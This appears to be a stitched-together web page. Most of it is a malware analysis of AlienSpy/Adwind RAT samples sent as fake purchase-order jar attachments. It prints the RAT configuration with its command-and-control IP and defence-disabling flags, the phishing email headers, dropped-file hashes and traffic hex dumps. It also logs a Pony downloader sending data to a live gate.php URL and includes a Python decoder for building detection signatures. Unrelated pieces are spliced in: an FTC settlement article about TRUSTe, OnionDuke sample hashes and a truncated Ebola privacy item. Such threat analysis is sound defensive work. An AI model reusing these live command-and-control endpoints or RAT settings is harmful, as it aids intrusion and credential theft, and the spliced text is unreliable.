State/Region: Colorado
City: Denver



79E9DD35AEF6558461C4B93CD0C55B76
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>AlienSpy</comment>
<entry key="pluginfolder">fy0qFUFuLP</entry>
<entry key="reconnetion_time">3000</entry>
<entry key="ps_hacker">true</entry>
<entry key="restore_system">true</entry>
<entry key="pluginfoldername">fy0qFUFuLP</entry>
<entry key="dns">38.89.137.248</entry>
<entry key="install_time">3000</entry>
<entry key="port2">1065</entry>
<entry key="port1">1064</entry>
<entry key="taskmgr">true</entry>
<entry key="vmware">false</entry>
<entry key="jarname">LcuSMagrlF</entry>
<entry key="msconfig">true</entry>
<entry key="mutex">VblVc5kEqY</entry>
<entry key="install">true</entry>
<entry key="instalar">true</entry>
<entry key="vbox">false</entry>
<entry key="password">7110eda4d09e062aa5e4a390b0a572ac0d2c0220</entry>
<entry key="NAME">xmas things</entry>
<entry key="extensionname">7h8</entry>
<entry key="prefix">xmas</entry>
<entry key="jarfoldername">jcwDpUEpCh</entry>
<entry key="uac">true</entry>
<entry key="win_defender">true</entry>
<entry key="

IP: 38.89.137.248
Decimal: 643402232
Hostname: 38.89.137.248
ISP: Cogent Communications
Country: United States


Created Files

I
 DB46ADCFAE462E7C475C171FBE66DF82  paymentadvice.jar

%USERPROFILE%\Application Data\evt88IWdHO\CnREgyvLBS.txt <<MD5:  abe6ef71e44d2e145033800d0dccea57 << strings are here (by classes)
%USERPROFILE%\Application Data\evt88IWdHO\Desktop.ini
%USERPROFILE%\Local Settings\Temp\asdqw15727804162199772615555.jar << Strings are here
%USERPROFILE%\Local Settings\Temp\iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) <<MD5:  fab8de636d6f1ec93eeecaade8b9bc68 Size: 755017 << Strings are here
%USERPROFILE%\29OVHAabdr.tmp << timestamp file << Strings are here

\deleted_files\%USERPROFILE%\\29OVHAabdr.tmp << timestamp file << Strings are here
\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\Desktop.ini << Strings are here
\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\unXX0JIhwW.txt <MD5:  DB46ADCFAE462E7C475C171FBE66DF82 < original jar << Strings are here
\deleted_files\%USERPROFILE%\\Local Settings\Temp\14583359.bat << Strings are here
\deleted_files\%USERPROFILE%\\Local Settings\Temp\asdqw4727319084772952101234.exe << Pony Downloader MD5:  b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122 < Strings are here
\deleted_files\%USERPROFILE%\\Local Settings\Temp\OiuFr7LcfXq1847924646026958055.vbs <<MD5:  9E1EDE0DEDADB7AF34C0222ADA2D58C9 Strings are here
\deleted_files\%USERPROFILE%\\xooJlYrm61.tmp < timestamp file << Strings are here
\deleted_files\C\WINDOWS\tem.txt - 0bytes

IWIMMQLGPST2624529381479181764.PNG MD5: fab8de636d6f1ec93eeecaade8b9bc68

├───com
│   └───java
│       │   Main.class << MD5:  d020b9fdac0139d43997f9ec14fa5947 Size: 7232
│       │   Manifest.mf << MD5:  a396d2898e8a83aa5233c4258de006e3 Size: 750412
│               │   01234.exe << MD5:  b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122
│               │   15555.jar << MD5:  abe6ef71e44d2e145033800d0dccea57 Size: 50922
│              
│               └───15555
│                   │   ID
│                   │   Main.class << MD5:  d020b9fdac0139d43997f9ec14fa5947 Size: 7232
│                   │   MANIFEST.MF << MD5:  a396d2898e8a83aa5233c4258de006e3 Size: 750412
│                   │
│                   ├───META-INF
│                   └───plugins
└───META-INF
        MANIFEST.MF << MD5:  042c2fa9077d96478ce585d210641d9a Size: 171


File types
  1. 14583359.bat (.txt) "Text file"
  2. 29OVHAabdr.tmp (.txt) "Text file"
  3. asdqw15727804162199772615555.jar (.zip) "PKZIP Compressed"
  4. asdqw4727319084772952101234.exe (.exe) "Executable File" 
  5. CnREgyvLBS.txt (.zip) "PKZIP Compressed"
  6. Desktop.ini (.txt) "Text file"
  7. DFR5.tmp (.txt) "Text file"
  8. iWimMQLgpsT2624529381479181764.png (.zip) "Zip Compressed"
  9. iWimMQLgpsT2624529381479181764.png (.zip) "PKZIP Compressed"
  10. OiuFr7LcfXq1847924646026958055.vbs (.txt) "Vbs script file"
  11. tem.txt (.txt) "Text file"
  12. unXX0JIhwW.txt (.zip) "PKZIP Compressed"
  13. xooJlYrm61.tmp (.txt) "Text file"
II

79e9dd35aef6558461c4b93cd0c55b76 Purchase Order.jar
Received: from magix-webmail (webmail.app.magix-online.com [193.254.184.250])
by smtp.app.magix-online.com (Postfix) with ESMTPSA id B626052E77F;
Sun, 16 Nov 2014 14:54:06 +0100 (CET)
Received: from 206.217.192.188 ([206.217.192.188]) by
 webmail.magix-online.com (Horde Framework) with HTTP; Sun, 16 Nov 2014
 14:54:06 +0100
Date: Sun, 16 Nov 2014 14:54:06 +0100
Message-ID: <20141116145406.Horde.YL7L4Bi7ap6_NXm76DDEaw2@webmail.magix-online.com>
From: Outokumpu Import Co Ltd <purchase@brentyil.org>
Subject: Re: Confirm correct details
Reply-to: jingwings@outlook.com
User-Agent: Internet Messaging Program (IMP) H5 (6.1.4)
Content-Type: multipart/mixed; boundary="=_FMdois7zoq7xTAV91epZoQ6"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
This message is in MIME format.
--=_FMdois7zoq7xTAV91epZoQ6
Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Dear Sir,
Please confirm the attached purchase order for your reference.
Please acknowledge Invoice for the final confirmation and confirm  
details are correct so we can proceed accordingly.
Please give me feedback through this email.
IBRAHIM MOHAMMAD AL FAR
Area Manager 
Central Region
Outokumpu Import Co Ltd
Tel:   +966-11-265-2030
Fax:  +966-11-265-0350
Mob: +966-50 610 8743
P.O Box: 172 Riyadh 11383
Kingdom of Saudi Arabia
--=_FMdois7zoq7xTAV91epZoQ6
Content-Type: application/java-archive; name="Purchase Order.jar"
Content-Description: Purchase Order.jar
Content-Disposition: attachment; size=125985; filename="Purchase Order.jar"
Content-Transfer-Encoding: base64

File paths
%USERPROFILE%\Application Data\jcwDpUEpCh\Desktop.ini
%USERPROFILE%\Application Data\jcwDpUEpCh\LcuSMagrlF.txt
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\3884
%USERPROFILE%\VblVc5kEqY.tmp
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor267205042636993976.reg
deleted_files\%USERPROFILE%\VblVc5kEqY.tmp
deleted_files\C\WINDOWS\tem.txt

File types
Desktop.ini (.txt) "Text file"
index.dat (.txt) "Text file"
LcuSMagrlF.txt (.zip) "PKZIP Compressed"
TaskNetworkGathor267205042636993976.reg (.txt) "Text file"
tem.txt (.txt) "Text file"
VblVc5kEqY.tmp (.txt) "Text file"

MD5 list
Desktop.ini     e783bdd20a976eaeaae1ff4624487420
index.dat       b431d50792262b0ef75a3d79a4ca4a81
LcuSMagrlF.txt  79e9dd35aef6558461c4b93cd0c55b76
79e9dd35aef6558461c4b93cd0c55b76.malware       79e9dd35aef6558461c4b93cd0c55b76
TaskNetworkGathor267205042636993976.reg        6486acf0ca96ecdc981398855255b699 << Strings are here
tem.txt         d41d8cd98f00b204e9800998ecf8427e
VblVc5kEqY.tmp  b5c6ea9aaf042d88ee8cd61ec305880b

III
B2856B11FF23D35DA2C9C906C61781BA Purchase Order.jar
File paths
%USERPROFILE%\Application Data\Sys32\Desktop.ini
%USERPROFILE%\Application Data\Sys32\Windows.jar.txt
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\1132
%USERPROFILE%\WWMI853JfC.tmp
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor7441169770678304780.reg
deleted_files\%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013110920131110\index.dat
deleted_files\%USERPROFILE%\WWMI853JfC.tmp
deleted_files\C\DFRA.tmp

deleted_files\C\WINDOWS\tem

File type list
Desktop.ini (.txt) "Text file"
DFRA.tmp (.txt) "Text file"
index.dat (.txt) "Text file"
TaskNetworkGathor7441169770678304780.reg (.txt) "Text file"
tem (.txt) "Text file"
Windows.jar.txt (.zip) "PKZIP Compressed"

WWMI853JfC.tmp (.txt) "Text file"

MD5 list
Desktop.ini     e783bdd20a976eaeaae1ff4624487420
DFRA.tmp        d41d8cd98f00b204e9800998ecf8427e
index.dat       b431d50792262b0ef75a3d79a4ca4a81
purchase.jar    b2856b11ff23d35da2c9c906c61781ba
TaskNetworkGathor7441169770678304780.reg       311af3b9a52ffc58f46ad83afb1e93b6
tem             d41d8cd98f00b204e9800998ecf8427e
Windows.jar.txt b2856b11ff23d35da2c9c906c61781ba
WWMI853JfC.tmp  8e222c61fc55c230407ef1eb21a7daa9



Traffic Information

Java Serialization Protocol traffic info

DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - Windows XP
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 2a 1f 8b  08 00 00 00 00 00 00 00 xp...*.. ........
00000025  6d 54 dd 8e d3 46 18 1d  12 16 b2 bb 59 40 fc 5d mT...F.. ....Y@.]
00000035  bb 52 2b 71 83 d7 76 1c  3b a1 12 10 58 16 36 2c .R+q..v. ;...X.6,
00000045  14 95 56 1b 24 4b d6 17  7b 9c cc 66 3c e3 ce 8c ..V.$K.. {..f<...
00000055  d7 a6 17 7d 8e 3e 44 1f  a0 12 2f c1 43 f4 b6 ef ...}.>D. ../.C...
00000065  d0 cf 6c 76 1d 2a 22 d9  19 7b be 9f 73 be 73 c6 ..lv.*". .{..s.s.
00000075  7f fd 4b b6 b4 22 77 4f  e1 0c ec d2 30 6e bf 53 ..K.."wO ....0n.S

DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - OSX Lion
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 33 1f 8b  08 00 00 00 00 00 00 00 xp...3.. ........
00000025  75 54 cd 6e db 46 10 de  c8 b5 2d ff 26 c8 1f 7a uT.n.F.. ..-.&..z
00000035  54 0f 45 7b d1 92 5c d1  94 89 02 4d 94 c0 b1 a5 T.E{..\. ...M....
00000045  d8 4d 51 23 89 73 22 56  dc a5 b5 16 b9 cb ec 2e .MQ#.s"V ........

B2856B11FF23D35DA2C9C906C61781BA on Windows XP
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 63 1f 8b  08 00 00 00 00 00 00 00 xp...c.. ........
00000025  6d 54 5d 6e db 46 10 de  48 91 2d db 8a 13 24 41 mT]n.F.. H.-...$A
00000035  fa ca 3e 14 08 0a 84 e6  bf a4 16 68 9a c4 75 1b ..>..... ...h..u.
00000045  c3 6e 0d b8 85 13 80 00  31 22 57 d2 5a e4 ee 76 .n...... 1"W.Z..v

79E9DD35AEF6558461C4B93CD0C55B76 - Windows XP
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 69 1f 8b  08 00 00 00 00 00 00 00 xp...i.. ........
00000025  6d 54 dd 6e db 36 14 66  ed fc 38 89 9b 16 ed d0 mT.n.6.f ..8.....
00000035  de 6a 17 03 8a 01 53 28  d9 92 ed 0d e8 d6 34 71 .j....S( ......4q
00000045  b6 c0 19 02 64 69 3b c0  80 70 2c d1 36 6d 4a 62 ....di;. .p,.6mJb



Serialization Protocol decoding:


The following fields are part of the serialization protocol and are "benign" and common.

AC ED (¬í) - Java Serialization protocol magic: STREAM_MAGIC = (short)0xaced
00 05 - Serialization version: STREAM_VERSION
75 (u) - Specifies that this is a new array - newArray: TC_ARRAY
72 (r) - Specifies that this is a new class - newClassDesc: TC_CLASSDESC
00 02 - Length of the class name
5B 42 AC F3 17 F8 06 08 54 E0 ([B¬ó.ø..Tà) - Serial class name and version identifier section, but the data appears to be encrypted
02 00 - Is Serializable flag - SC_SERIALIZABLE
78 70 (xp) - Low-level information identifying the serialized fields
1f 8b 08 00 00 00 00 00 00 00 - GZIP header as seen in the serialization stream

As you see, all Windows traffic captures have identical fields following the GZIP stream, while the OSX traffic has different data. The jar files that carried the Pony Downloader payload did not have any other OSX malware packaged, and I saw no activity on OSX other than calling the C2 and writing to the randomly named timestamp file (e.g. VblVc5kEqY.tmp, which is updated with the current timestamp in Unix epoch format).

A signature combining the Stream Magic exchange with all the other benign fields in this order will be usable. However, it will be prone to false positives unless you also use the fields after the GZIP header for OS-specific signatures.

Another signature can be based on the Transfer.jar download, as seen below.


DB46ADCFAE462E7C475C171FBE66DF82 - downloading fab8de636d6f1ec93eeecaade8b9bc68
iWimMQLgpsT2624529381479181764.png (seen as Transfer.jar in the stream), which contains 15555.jar in its Manifest.mf, which in turn contains 15555.exe (Pony loader) in its Manifest.mf

IHEAKA_000C297BA8DA << IHEAKA is the name of the RAT client; it is different in each infection.

00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  77 04                                            w.
00000006  00 00 00 01                                      ....
0000000A  77 15                                            w.
0000000C  00 13 49 48 45 41 4b 41  5f 30 30 30 43 32 39 37 ..IHEAKA _000C297
0000001C  42 41 38 44 41                                   BA8DA
    00000004  77 0e 00 0c 54 72 61 6e  73 66 65 72 2e 6a 61 72 w...Tran sfer.jar
    00000014  7a 00 00 04 00 50 4b 03  04 14 00 08 08 08 00 46 z....PK. .......F
    00000024  0c 71 45 00 00 00 00 00  00 00 00 00 00 00 00 14 .qE..... ........
    00000034  00 04 00 4d 45 54 41 2d  49 4e 46 2f 4d 41 4e 49 ...META- INF/MANI
    00000044  46 45 53 54 2e 4d 46 fe  ca 00 00 4d 8d 4d 0b c2 FEST.MF. ...M.M..

---- snip----

000ABBA0  00 09 00 00 00 31 35 35  35 35 2e 6a 61 72 74 97 .....155 55.jart.
    000ABBB0  43 70 26 8c a2 44 63 db  9c d8 b6 9d 7c b1 6d db Cp&..Dc. ....|.m.
    000ABBC0  c6 c4 b6 6d db b6 6d db  99 d8 76 f2 fe e5 dd bc ...m..m. ..v.....
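The two exchanges above, the gzip byte[] beacon described under "Serialization Protocol decoding" and the block-data Transfer.jar download, can be walked with a small decoder. The following is an added example, not code from the original post or from the RAT: the only value it assumes beyond the hex shown above is the standard serialVersionUID of byte[], and the sample inputs are constructed from the dumps in the post.

```python
"""Top-level decoder for the Java serialization streams in the captures above.
Added example, not code from the original post or from the RAT; the sample
inputs at the bottom are constructed from the hex dumps shown in the post."""
import gzip
import struct
import zlib

STREAM_MAGIC, STREAM_VERSION = 0xACED, 0x0005
TC_NULL, TC_CLASSDESC, TC_ENDBLOCKDATA = 0x70, 0x72, 0x78
TC_ARRAY, TC_BLOCKDATA, TC_BLOCKDATALONG = 0x75, 0x77, 0x7A
SC_SERIALIZABLE = 0x02
# "[B" and the "AC F3 17 F8 06 08 54 E0" after it are the class name and the
# serialVersionUID of byte[], a fixed JVM value (assumed here, not stated in the post).
BYTE_ARRAY_SUID = 0xACF317F8060854E0
# GZIPOutputStream writes MTIME, XFL and OS as zeros: "1f 8b 08 00 00 00 00 00 00 00"
JAVA_GZIP_HEADER = bytes.fromhex("1f8b0800" "00000000" "0000")


class StreamError(ValueError):
    """The bytes are not (a prefix of) a serialization stream we understand."""

def parse_stream(data: bytes) -> list:
    """Return the top-level records of one stream direction as (kind, value) pairs."""
    if len(data) < 4 or struct.unpack(">HH", data[:4]) != (STREAM_MAGIC, STREAM_VERSION):
        raise StreamError("missing STREAM_MAGIC / STREAM_VERSION")
    pos, records = 4, []
    while pos < len(data):
        tc, pos = data[pos], pos + 1
        if tc == TC_ARRAY:              # 75 <classDesc> <int length> <elements>
            rec, pos = _parse_byte_array(data, pos)
            records.append(("array", rec))
            continue
        if tc == TC_BLOCKDATA:          # 77 <1-byte length> <bytes>
            n, pos = data[pos], pos + 1
        elif tc == TC_BLOCKDATALONG:    # 7a <4-byte length> <bytes>
            n, pos = struct.unpack(">I", data[pos:pos + 4])[0], pos + 4
        else:
            raise StreamError(f"unsupported type code 0x{tc:02x} at offset {pos - 1}")
        records.append(("blockdata", data[pos:pos + n]))  # slice tolerates a snipped capture
        pos += n
    return records

def _parse_byte_array(data: bytes, pos: int):
    """Parse newClassDesc for [B plus the array body; returns (record, next offset)."""
    if data[pos] != TC_CLASSDESC:
        raise StreamError("expected TC_CLASSDESC after TC_ARRAY")
    name_len = struct.unpack(">H", data[pos + 1:pos + 3])[0]
    name = data[pos + 3:pos + 3 + name_len].decode("utf-8")
    pos += 3 + name_len
    suid, flags, field_count = struct.unpack(">QBH", data[pos:pos + 11])  # suid + "02 00 00"
    pos += 11
    if (name, suid, flags, field_count) != ("[B", BYTE_ARRAY_SUID, SC_SERIALIZABLE, 0):
        raise StreamError(f"unexpected class descriptor {name!r} / {suid:#x}")
    if data[pos:pos + 2] != bytes([TC_ENDBLOCKDATA, TC_NULL]):  # the "78 70"
        raise StreamError("expected end of classAnnotation and TC_NULL superclass")
    length = struct.unpack(">I", data[pos + 2:pos + 6])[0]      # e.g. "00 00 03 2a"
    pos += 6
    return {"class": name, "declared_len": length, "body": data[pos:pos + length]}, pos + length

def is_gzip_bytearray_beacon(data: bytes) -> bool:
    """OS-independent signature from the post: fixed [B descriptor, then a Java GZIP header."""
    try:
        records = parse_stream(data)
    except (StreamError, struct.error, IndexError):  # the latter two: cut off mid-descriptor
        return False
    return any(k == "array" and v["body"].startswith(JAVA_GZIP_HEADER) for k, v in records)

def extract_gzip_payload(data: bytes) -> bytes:
    """Decompress the byte[] contents; only possible when the capture holds the whole array."""
    for kind, rec in parse_stream(data):
        if kind == "array" and len(rec["body"]) == rec["declared_len"]:
            return gzip.decompress(rec["body"])
    raise StreamError("no complete gzip byte[] record in stream")

def read_utf(block: bytes) -> str:
    """Decode a DataOutput.writeUTF record (2-byte length + UTF-8) found in block data."""
    return block[2:2 + struct.unpack(">H", block[:2])[0]].decode("utf-8")

def java_style_gzip(payload: bytes) -> bytes:
    """Constructed stand-in for GZIPOutputStream: zero header fields, raw DEFLATE, CRC32 + ISIZE."""
    comp = zlib.compressobj(wbits=-15)
    body = comp.compress(payload) + comp.flush()
    return JAVA_GZIP_HEADER + body + struct.pack("<II", zlib.crc32(payload), len(payload))

def build_bytearray_stream(elements: bytes) -> bytes:
    """Constructed: the bytes ObjectOutputStream.writeObject(byte[]) emits for `elements`."""
    desc = (bytes([TC_ARRAY, TC_CLASSDESC]) + struct.pack(">H", 2) + b"[B"
            + struct.pack(">QBH", BYTE_ARRAY_SUID, SC_SERIALIZABLE, 0)
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))
    return struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION) + desc + struct.pack(">I", len(elements)) + elements

# Constructed samples taken from the hex dumps in the post: the client's first two
# block-data records, and the server's reply cut off a few bytes into the ZIP.
CLIENT_HELLO = bytes.fromhex("aced0005" "770400000001" "77150013") + b"IHEAKA_000C297BA8DA"
SERVER_REPLY = bytes.fromhex("aced0005" "770e000c") + b"Transfer.jar" + bytes.fromhex("7a00000400" "504b0304")
```

Feed each direction of a reassembled TCP stream to `parse_stream` separately; `is_gzip_bytearray_beacon` works on a truncated capture, while `extract_gzip_payload` needs the whole array.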


Pony downloader traffic

 HTTP requests
URL: http://meetngreetindia.com/scala/gate.php
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://meetngreetindia.com/scala/gate.php
TYPE: GET
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
 DNS requests
meetngreetindia.com (50.28.15.25)
 TCP connections
50.28.15.25:80

IP: 50.28.15.25
Decimal: 840699673
Hostname: mahanadi3.ewebguru.net
ISP: Liquid Web
Organization: eWebGuru
State/Region: Michigan
City: Lansing

https://www.virustotal.com/en/ip-address/50.28.15.25/information/




IP-Domain Information
I
DB46ADCFAE462E7C475C171FBE66DF82 paymentadvice.jar 
IP: 204.45.207.40
Decimal: 3425554216
Hostname: 212.clients.instantdedis.com
ISP: FDCservers.net
Country: United States
State/Region: Colorado
City: Denver

meetngreetindia.com (50.28.15.25)
 TCP connections
50.28.15.25:80
Decimal: 840699673
Hostname: mahanadi3.ewebguru.net
ISP: Liquid Web
Organization: eWebGuru
State/Region: Michigan
City: Lansing

II
79E9DD35AEF6558461C4B93CD0C55B76 Purchase order.jar
IP: 38.89.137.248
Decimal: 643402232
Hostname: 38.89.137.248
ISP: Cogent Communications
Country: United States

III
B2856B11FF23D35DA2C9C906C61781BA Purchase order.jar
installone.no-ip.biz
IP Address:   185.32.221.17
Country:      Switzerland
Network Name: CH-DATASOURCE-20130812
Owner Name:   Datasource AG
From IP:      185.32.220.0
To IP:        185.32.223.255
Allocated:    Yes
Contact Name: Rolf Tschumi
Address:      mgw online service, Roetihalde 12, CH-8820 Waedenswil
Email:        rolf.tschumi@mgw.ch
Abuse Email:  abuse@softplus.net
   

Virustotal

https://www.virustotal.com/en/file/02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45/analysis/
SHA256: 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45
MD5 db46adcfae462e7c475c171fbe66df82
SHA1 2b43211053d00147b2cb9847843911c771fd3db4
SHA256 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45
ssdeep 3072:VR/6ZQvChcDfJNBOFJKMRXcCqfrCUMBpXOg84WoUeonNTFN:LdvCGJN0FJ1RXcgBpXOjOjSNTFN
File size 128.1 KB ( 131178 bytes )
File type ZIP
Magic literal: Zip archive data, at least v2.0 to extract
TrID ZIP compressed archive (100.0%)
File name: Payment Advice.jar
Detection ratio: 6 / 54
Analysis date: 2014-11-16 20:58:08 UTC ( 1 day, 4 hours ago )
Ikarus Trojan.Java.Adwind 20141116
TrendMicro JAVA_ADWIND.XXO 20141116
TrendMicro-HouseCall JAVA_ADWIND.XXO 20141116
DrWeb Java.Adwind.3 20141116
Kaspersky HEUR:Trojan.Java.Generic 20141116
ESET-NOD32 a variant of Java/Adwind.T 20141116

https://www.virustotal.com/en/file/733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c/analysis/1416194595/
SHA256: 733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c
MD5 fab8de636d6f1ec93eeecaade8b9bc68
File name: iWimMQLgpsT2624529381479181764.png
Detection ratio: 23 / 53
Analysis date: 2014-11-17 03:23:15 UTC ( 0 minutes ago )
AVG Zbot.URE 20141116
Qihoo-360 Win32/Trojan.fff 20141117
ESET-NOD32 Win32/PSW.Fareit.A 20141117
Fortinet W32/Inject.SXVW!tr 20141117
Antiy-AVL Trojan[PSW]/Win32.Tepfer 20141117
AVware Trojan.Win32.Generic!BT 20141117
DrWeb Trojan.PWS.Stealer.13319 20141117
Symantec Trojan.Maljava 20141117
McAfee RDN/Generic Exploit!1m3 20141117
McAfee-GW-Edition RDN/Generic Exploit!1m3 20141117
Sophos Mal/JavaJar-A 20141117
Avast Java:Malware-gen [Trj] 20141117
Cyren Java/Agent.KS 20141117
F-Prot Java/Agent.KS 20141117
Kaspersky HEUR:Trojan.Java.Generic 20141117
Emsisoft Gen:Variant.Kazy.494557 (B) 20141117
Ad-Aware Gen:Variant.Kazy.494557 20141117
BitDefender Gen:Variant.Kazy.494557 20141117
F-Secure Gen:Variant.Kazy.494557 20141116
GData Gen:Variant.Kazy.494557 20141117
MicroWorld-eScan Gen:Variant.Kazy.494557 20141117
Ikarus Exploit.Java.Agent 20141117
Norman Adwind.E 20141116

https://www.virustotal.com/en/file/91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725/analysis/
MD5 b5e7cd42b45f8670adaf96bbca5ae2d0
SHA256: 91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725
File name: asdqw4727319084772952101234.exe
Detection ratio: 12 / 54
Analysis date: 2014-11-17 03:21:30 UTC
AVG Zbot.URE 20141116
AVware Trojan.Win32.Generic!BT 20141117
Ad-Aware Gen:Variant.Kazy.494557 20141117
Antiy-AVL Trojan[PSW]/Win32.Tepfer 20141116
BitDefender Gen:Variant.Kazy.494557 20141117
DrWeb Trojan.PWS.Stealer.13319 20141117
ESET-NOD32 Win32/PSW.Fareit.A 20141117
Emsisoft Gen:Variant.Kazy.494557 (B) 20141117
F-Secure Gen:Variant.Kazy.494557 20141116
GData Gen:Variant.Kazy.494557 20141117
MicroWorld-eScan Gen:Variant.Kazy.494557 20141117
Qihoo-360 Win32/Trojan.fff 20141117




TRUSTe Reaches Settlement with FTC Over Alleged FTC Act Violations

On November 17, 2014, the Federal Trade Commission announced that data privacy certifier True Ultimate Standards Everywhere, Inc. (“TRUSTe”) has agreed to settle charges that the company deceived consumers about its recertification program and misrepresented that it was a non-profit entity in violation of Section 5 of the FTC Act.

TRUSTe offers a variety of assessments and certifications (“Certified Privacy Seals”) for online business websites and mobile applications. The Certified Privacy Seals are based on meeting certain standards related to the transparency of the company’s data practices and the choices available to consumers regarding the collection and use of their personal information. The Certified Privacy Seals help assure consumers that TRUSTe clients are compliant with privacy standards such as the Children’s Online Privacy Protection Act and the U.S.-EU Safe Harbor Framework.

In its complaint against TRUSTe, the FTC alleged that from 2006 to January 2013, the company failed to conduct an annual review of its clients’ compliance with TRUSTe’s Certified Privacy Seals requirements in over 1,000 instances. The FTC also accused TRUSTe of misrepresenting its corporate status by recertifying numerous clients that referred to TRUSTe as a non-profit entity after it became a for-profit company in July 2008.

In the proposed consent order, TRUSTe agreed to (1) a number of requirements and restrictions related to its Certified Privacy Seals program and (2) pay $200,000. Under the consent order, the company must provide the FTC with an annual sworn statement during the next 10 years containing information about its certification programs, including the total number of new seals awarded and detailed explanations of its certification criteria. The consent order also prohibits the company from misrepresenting its certification process, the certification of its clients or its corporate status.

“TRUSTe promised to hold companies accountable for protecting consumer privacy, but it fell short of that pledge,” said FTC Chairwoman Edith Ramirez. “Self-regulation plays an important role in helping to protect consumers…But when companies fail to live up to their promises to consumers, the FTC will not hesitate to take action.”

Update: On March 18, 2015, the FTC approved the final settlement order with TRUSTe.

OnionDuke samples

File attributes

Size: 219136
MD5:  28F96A57FA5FF663926E9BAD51A1D0CB

Size: 126464
MD5:  C8EB6040FD02D77660D19057A38FF769


Size: 316928
MD5:  D1CE79089578DA2D41F1AD901F7B1014


Virustotal info

https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/
SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Analysis date: 2014-11-15 18:37:30 UTC ( 8 hours, 44 minutes ago ) 
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115


https://www.virustotal.com/en/file/0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade/analysis/
SHA256: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
File name: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
Detection ratio: 19 / 55
Analysis date: 2014-11-15 18:37:25 UTC ( 8 hours, 47 minutes ago ) 
Antivirus Result Update
AVware Trojan.Win32.Generic!BT 20141115
Ad-Aware Backdoor.Generic.933739 20141115
Baidu-International Trojan.Win32.OnionDuke.BA 20141107
BitDefender Backdoor.Generic.933739 20141115
ESET-NOD32 a variant of Win32/OnionDuke.A 20141115
Emsisoft Backdoor.Generic.933739 (B) 20141115
F-Secure Backdoor:W32/OnionDuke.A 20141115
GData Backdoor.Generic.933739 20141115
Ikarus Trojan.Win32.Onionduke 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
McAfee RDN/Generic BackDoor!zw 20141115
McAfee-GW-Edition BehavesLike.Win32.Trojan.fh 20141114
MicroWorld-eScan Backdoor.Generic.933739 20141115
Norman OnionDuke.B 20141115
Sophos Troj/Ransom-ANU 20141115
Symantec Backdoor.Miniduke!gen4 20141115
TrendMicro BKDR_ONIONDUKE.AD 20141115
TrendMicro-HouseCall BKDR_ONIONDUKE.AD 20141115
VIPRE Trojan.Win32.Generic!BT 20141115


Ebola and Other Health Emergencies Create Workplace Privacy Dilemmas

Hunton & Williams Labor & Employment partner Susan Wiltsie reports:

